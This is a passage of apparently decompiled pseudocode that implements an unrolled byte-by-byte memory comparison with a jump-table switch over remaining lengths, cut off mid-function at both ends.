																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0xf] & 0x000000ff) - (_t1339[0xf] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t146 = _t1270 > 0;
																								__eflags = _t146;
																								_t1270 = (0 | _t146) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								goto L81;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t1270 = (_t1353[8] & 0x000000ff) - (_t1339[8] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t103 = _t1270 > 0;
																				__eflags = _t103;
																				_t1270 = (0 | _t103) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[9] & 0x000000ff) - (_t1339[9] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t109 = _t1270 > 0;
																					__eflags = _t109;
																					_t1270 = (0 | _t109) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xa] & 0x000000ff) - (_t1339[0xa] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t115 = _t1270 > 0;
																						__eflags = _t115;
																						_t1270 = (0 | _t115) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xb] & 0x000000ff) - (_t1339[0xb] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t121 = _t1270 > 0;
																							__eflags = _t121;
																							_t1270 = (0 | _t121) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							goto L68;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t1270 = (_t1353[4] & 0x000000ff) - (_t1339[4] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t77 = _t1270 > 0;
																			__eflags = _t77;
																			_t1270 = (0 | _t77) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[5] & 0x000000ff) - (_t1339[5] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t83 = _t1270 > 0;
																				__eflags = _t83;
																				_t1270 = (0 | _t83) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[6] & 0x000000ff) - (_t1339[6] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t89 = _t1270 > 0;
																					__eflags = _t89;
																					_t1270 = (0 | _t89) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[7] & 0x000000ff) - (_t1339[7] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t95 = _t1270 > 0;
																						__eflags = _t95;
																						_t1270 = (0 | _t95) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L55;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t1270 = (_t1049 & 0x000000ff) - ( *_t1339 & 0x000000ff);
																	__eflags = _t1270;
																	if(_t1270 != 0) {
																		__eflags = _t1270;
																		_t51 = _t1270 > 0;
																		__eflags = _t51;
																		_t1270 = (0 | _t51) * 2 - 1;
																	}
																	__eflags = _t1270;
																	if(_t1270 == 0) {
																		_t1270 = (_t1353[1] & 0x000000ff) - (_t1339[1] & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t57 = _t1270 > 0;
																			__eflags = _t57;
																			_t1270 = (0 | _t57) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = (_t1353[2] & 0x000000ff) - (_t1339[2] & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t63 = _t1270 > 0;
																				__eflags = _t63;
																				_t1270 = (0 | _t63) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = (_t1353[3] & 0x000000ff) - (_t1339[3] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t69 = _t1270 > 0;
																					__eflags = _t69;
																					_t1270 = (0 | _t69) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					goto L42;
																				}
																			}
																		}
																	}
																}
																L228:
																_t1021 = _t1270;
																goto L528;
															}
															_t1354 =  &(_t1353[_t1344]);
															_t1340 =  &(_t1339[_t1344]);
															switch( *((intOrPtr*)(_t1344 * 4 +  &M00B1F62A))) {
																case 0:
																	L227:
																	_t1270 = 0;
																	__eflags = 0;
																	goto L228;
																case 1:
																	L320:
																	__eax =  *(__edx - 1) & 0x000000ff;
																	__ecx =  *(__esi - 1) & 0x000000ff;
																	__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		__eax = 0 | __ecx > 0x00000000;
																		__ecx = (__ecx > 0) * 2 - 1;
																	}
																	goto L228;
																case 2:
																	L413:
																	__eflags =  *(__esi - 2) -  *(__edx - 2);
																	if( *(__esi - 2) ==  *(__edx - 2)) {
																		goto L227;
																	} else {
																		goto L317;
																	}
																	goto L529;
																case 3:
																	L314:
																	__eax =  *(__edx - 3) & 0x000000ff;
																	__ecx =  *(__esi - 3) & 0x000000ff;
																	__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		__eax = 0;
																		__eflags = __ecx;
																		_t594 = __ecx > 0;
																		__eflags = _t594;
																		__eax = 0 | _t594;
																		__ecx = _t594 * 2 - 1;
																	}
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		goto L228;
																	} else {
																		L317:
																		__eax =  *(__edx - 2) & 0x000000ff;
																		__ecx =  *(__esi - 2) & 0x000000ff;
																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t600 = __ecx > 0;
																			__eflags = _t600;
																			__eax = 0 | _t600;
																			__ecx = _t600 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			goto L320;
																		}
																	}
																	goto L529;
																case 4:
																	L214:
																	_t1063 =  *(_t1354 - 4);
																	__eflags = _t1063 -  *(_t1340 - 4);
																	if(_t1063 ==  *(_t1340 - 4)) {
																		goto L227;
																	} else {
																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t405 = _t1270 > 0;
																			__eflags = _t405;
																			_t1270 = (0 | _t405) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t411 = _t1270 > 0;
																				__eflags = _t411;
																				_t1270 = (0 | _t411) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t417 = _t1270 > 0;
																					__eflags = _t417;
																					_t1270 = (0 | _t417) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t423 = _t1270 > 0;
																						__eflags = _t423;
																						_t1270 = (0 | _t423) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L227;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 5:
																	L307:
																	__eax =  *(__esi - 5);
																	__eflags =  *(__esi - 5) -  *(__edx - 5);
																	if( *(__esi - 5) ==  *(__edx - 5)) {
																		goto L320;
																	} else {
																		goto L308;
																	}
																	goto L529;
																case 6:
																	L400:
																	__eax =  *(__esi - 6);
																	__eflags =  *(__esi - 6) -  *(__edx - 6);
																	if( *(__esi - 6) ==  *(__edx - 6)) {
																		goto L413;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 6) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t764 = __ecx > 0;
																			__eflags = _t764;
																			__eax = 0 | _t764;
																			__ecx = _t764 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 5) & 0x000000ff;
																			__eax =  *(__edx - 5) & 0x000000ff;
																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t770 = __ecx > 0;
																				__eflags = _t770;
																				__eax = 0 | _t770;
																				__ecx = _t770 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 4) & 0x000000ff;
																				__eax =  *(__edx - 4) & 0x000000ff;
																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t776 = __ecx > 0;
																					__eflags = _t776;
																					__eax = 0 | _t776;
																					__ecx = _t776 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 3) & 0x000000ff;
																					__eax =  *(__edx - 3) & 0x000000ff;
																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t782 = __ecx > 0;
																						__eflags = _t782;
																						__eax = 0 | _t782;
																						__ecx = _t782 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L413;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 7:
																	L493:
																	__eax =  *(__esi - 7);
																	__eflags =  *(__esi - 7) -  *(__edx - 7);
																	if( *(__esi - 7) ==  *(__edx - 7)) {
																		goto L314;
																	} else {
																		__eax =  *(__edx - 7) & 0x000000ff;
																		__ecx =  *(__esi - 7) & 0x000000ff;
																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t943 = __ecx > 0;
																			__eflags = _t943;
																			__eax = 0 | _t943;
																			__ecx = _t943 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 6) & 0x000000ff;
																			__eax =  *(__edx - 6) & 0x000000ff;
																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t949 = __ecx > 0;
																				__eflags = _t949;
																				__eax = 0 | _t949;
																				__ecx = _t949 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				L308:
																				__eax =  *(__edx - 5) & 0x000000ff;
																				__ecx =  *(__esi - 5) & 0x000000ff;
																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t582 = __ecx > 0;
																					__eflags = _t582;
																					__eax = 0 | _t582;
																					__ecx = _t582 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__eax =  *(__edx - 4) & 0x000000ff;
																					__ecx =  *(__esi - 4) & 0x000000ff;
																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t588 = __ecx > 0;
																						__eflags = _t588;
																						__eax = 0 | _t588;
																						__ecx = _t588 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L314;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 8:
																	L201:
																	_t1062 =  *(_t1354 - 8);
																	__eflags = _t1062 -  *(_t1340 - 8);
																	if(_t1062 ==  *(_t1340 - 8)) {
																		goto L214;
																	} else {
																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t380 = _t1270 > 0;
																			__eflags = _t380;
																			_t1270 = (0 | _t380) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t386 = _t1270 > 0;
																				__eflags = _t386;
																				_t1270 = (0 | _t386) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t392 = _t1270 > 0;
																					__eflags = _t392;
																					_t1270 = (0 | _t392) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t398 = _t1270 > 0;
																						__eflags = _t398;
																						_t1270 = (0 | _t398) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L214;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 9:
																	L294:
																	__eax =  *(__esi - 9);
																	__eflags =  *(__esi - 9) -  *(__edx - 9);
																	if( *(__esi - 9) ==  *(__edx - 9)) {
																		goto L307;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 9) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t556 = __ecx > 0;
																			__eflags = _t556;
																			__eax = 0 | _t556;
																			__ecx = _t556 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 8) & 0x000000ff;
																			__eax =  *(__edx - 8) & 0x000000ff;
																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t562 = __ecx > 0;
																				__eflags = _t562;
																				__eax = 0 | _t562;
																				__ecx = _t562 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 7) & 0x000000ff;
																				__eax =  *(__edx - 7) & 0x000000ff;
																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t568 = __ecx > 0;
																					__eflags = _t568;
																					__eax = 0 | _t568;
																					__ecx = _t568 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 6) & 0x000000ff;
																					__eax =  *(__edx - 6) & 0x000000ff;
																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t574 = __ecx > 0;
																						__eflags = _t574;
																						__eax = 0 | _t574;
																						__ecx = _t574 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L307;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xa:
																	L387:
																	__eax =  *(__esi - 0xa);
																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
																		goto L400;
																	} else {
																		__eax =  *(__edx - 0xa) & 0x000000ff;
																		__ecx =  *(__esi - 0xa) & 0x000000ff;
																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t739 = __ecx > 0;
																			__eflags = _t739;
																			__eax = 0 | _t739;
																			__ecx = _t739 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 9) & 0x000000ff;
																			__eax =  *(__edx - 9) & 0x000000ff;
																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t745 = __ecx > 0;
																				__eflags = _t745;
																				__eax = 0 | _t745;
																				__ecx = _t745 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 8) & 0x000000ff;
																				__eax =  *(__edx - 8) & 0x000000ff;
																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t751 = __ecx > 0;
																					__eflags = _t751;
																					__eax = 0 | _t751;
																					__ecx = _t751 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 7) & 0x000000ff;
																					__eax =  *(__edx - 7) & 0x000000ff;
																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t757 = __ecx > 0;
																						__eflags = _t757;
																						__eax = 0 | _t757;
																						__ecx = _t757 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L400;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xb:
																	L480:
																	__eax =  *(__esi - 0xb);
																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
																		goto L493;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xb) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t917 = __ecx > 0;
																			__eflags = _t917;
																			__eax = 0 | _t917;
																			__ecx = _t917 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xa) & 0x000000ff;
																			__eax =  *(__edx - 0xa) & 0x000000ff;
																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t923 = __ecx > 0;
																				__eflags = _t923;
																				__eax = 0 | _t923;
																				__ecx = _t923 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 9) & 0x000000ff;
																				__eax =  *(__edx - 9) & 0x000000ff;
																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t929 = __ecx > 0;
																					__eflags = _t929;
																					__eax = 0 | _t929;
																					__ecx = _t929 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 8) & 0x000000ff;
																					__eax =  *(__edx - 8) & 0x000000ff;
																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t935 = __ecx > 0;
																						__eflags = _t935;
																						__eax = 0 | _t935;
																						__ecx = _t935 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L493;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xc:
																	L188:
																	_t1061 =  *(_t1354 - 0xc);
																	__eflags = _t1061 -  *(_t1340 - 0xc);
																	if(_t1061 ==  *(_t1340 - 0xc)) {
																		goto L201;
																	} else {
																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t355 = _t1270 > 0;
																			__eflags = _t355;
																			_t1270 = (0 | _t355) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t361 = _t1270 > 0;
																				__eflags = _t361;
																				_t1270 = (0 | _t361) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t367 = _t1270 > 0;
																					__eflags = _t367;
																					_t1270 = (0 | _t367) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t373 = _t1270 > 0;
																						__eflags = _t373;
																						_t1270 = (0 | _t373) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L201;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0xd:
																	L281:
																	__eax =  *(__esi - 0xd);
																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
																		goto L294;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xd) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t531 = __ecx > 0;
																			__eflags = _t531;
																			__eax = 0 | _t531;
																			__ecx = _t531 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xc) & 0x000000ff;
																			__eax =  *(__edx - 0xc) & 0x000000ff;
																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t537 = __ecx > 0;
																				__eflags = _t537;
																				__eax = 0 | _t537;
																				__ecx = _t537 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xb) & 0x000000ff;
																				__eax =  *(__edx - 0xb) & 0x000000ff;
																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t543 = __ecx > 0;
																					__eflags = _t543;
																					__eax = 0 | _t543;
																					__ecx = _t543 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xa) & 0x000000ff;
																					__eax =  *(__edx - 0xa) & 0x000000ff;
																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t549 = __ecx > 0;
																						__eflags = _t549;
																						__eax = 0 | _t549;
																						__ecx = _t549 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L294;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xe:
																	L374:
																	__eax =  *(__esi - 0xe);
																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
																		goto L387;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xe) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t713 = __ecx > 0;
																			__eflags = _t713;
																			__eax = 0 | _t713;
																			__ecx = _t713 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xd) & 0x000000ff;
																			__eax =  *(__edx - 0xd) & 0x000000ff;
																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t719 = __ecx > 0;
																				__eflags = _t719;
																				__eax = 0 | _t719;
																				__ecx = _t719 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xc) & 0x000000ff;
																				__eax =  *(__edx - 0xc) & 0x000000ff;
																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t725 = __ecx > 0;
																					__eflags = _t725;
																					__eax = 0 | _t725;
																					__ecx = _t725 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xb) & 0x000000ff;
																					__eax =  *(__edx - 0xb) & 0x000000ff;
																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t731 = __ecx > 0;
																						__eflags = _t731;
																						__eax = 0 | _t731;
																						__ecx = _t731 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L387;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xf:
																	L467:
																	__eax =  *(__esi - 0xf);
																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
																		goto L480;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xf) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t892 = __ecx > 0;
																			__eflags = _t892;
																			__eax = 0 | _t892;
																			__ecx = _t892 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xe) & 0x000000ff;
																			__eax =  *(__edx - 0xe) & 0x000000ff;
																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t898 = __ecx > 0;
																				__eflags = _t898;
																				__eax = 0 | _t898;
																				__ecx = _t898 * 2 - 1;
																			}
																			__eflags = __ecx;
